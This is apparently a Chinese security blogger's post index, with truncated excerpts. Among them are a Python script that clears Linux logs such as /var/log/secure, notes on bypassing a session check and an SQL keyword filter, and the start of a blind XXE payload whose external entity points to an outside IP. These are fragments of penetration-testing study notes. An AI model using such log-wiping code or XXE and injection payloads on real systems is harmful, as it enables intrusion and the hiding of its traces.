摘要: (1)“你都不知道我昨天学到几点,好困啊。”你安慰自己学到很晚,你安慰自己很勤奋,可是成绩依然不见增长,在别人眼中你足够努力,可在结果面前你一败涂地。“老板,我昨天还加班到很晚,回去又继续工作了呢。”你安慰自己足够奋斗足够为了生活打拼,老板面对着你的借口假意夸赞,实际却对你没一点进步的业绩暗暗摇头。阅读全文
posted @ 2017-12-08 23:51 代码青春ζ 阅读(133) 评论(0) 编辑
摘要: 命令执行处 linux windows 1.//变量 类型 描述 2.//%ALLUSERSPROFILE% 本地 返回“所有用户”配置文件的位置。 3.//%APPDATA% 本地 返回默认情况下应用程序存储数据的位置。 4.//%CD% 本地 返回当前目录字符串。 5.//%CMDCMDLINE阅读全文
posted @ 2018-06-07 23:16 代码青春ζ 阅读(11) 评论(0) 编辑
该文被密码保护。
posted @ 2018-05-15 16:13 代码青春ζ 阅读(3) 评论(0) 编辑
摘要: #coding=utf-8 import os import sys import subprocess def Clear_The_Log(host): logs = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/...阅读全文
posted @ 2018-05-10 19:00 代码青春ζ 阅读(28) 评论(0) 编辑
该文被密码保护。
posted @ 2018-04-20 13:49 代码青春ζ 阅读(0) 评论(0) 编辑
该文被密码保护。
posted @ 2018-04-19 13:31 代码青春ζ 阅读(3) 评论(0) 编辑
摘要: 先说一个越权 验证是否存在session 然后执行js跳转 那么禁用js即可越权之 在sqlcheck函数中 查到关键字替换成中文字符 可是又有卵用,大写就能过 找到一处没有用引号来保护的 然而不能用括号不能用引号 并且不能用联合注入 想搞出管理员数据好像应该不可能 然后找到一处HTTP头注入 比较阅读全文
posted @ 2018-04-14 13:13 代码青春ζ 阅读(42) 评论(0) 编辑
该文被密码保护。
posted @ 2018-03-25 16:25 代码青春ζ 阅读(3) 评论(0) 编辑
摘要: 好久没学习技术了 很多东西都忘了 复习一下 测试代码 第一种方法 第二种方法 第三种方法 第四种 无回显的情况 提交 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE try[ <!ENTITY % int SYSTEM "http://123.206阅读全文
posted @ 2018-03-18 17:21 代码青春ζ 阅读(29) 评论(0) 编辑
该文被密码保护。
posted @ 2018-03-15 13:22 代码青春ζ 阅读(1) 评论(0) 编辑
该文被密码保护。
posted @ 2018-02-09 18:28 代码青春ζ 阅读(3) 评论(0) 编辑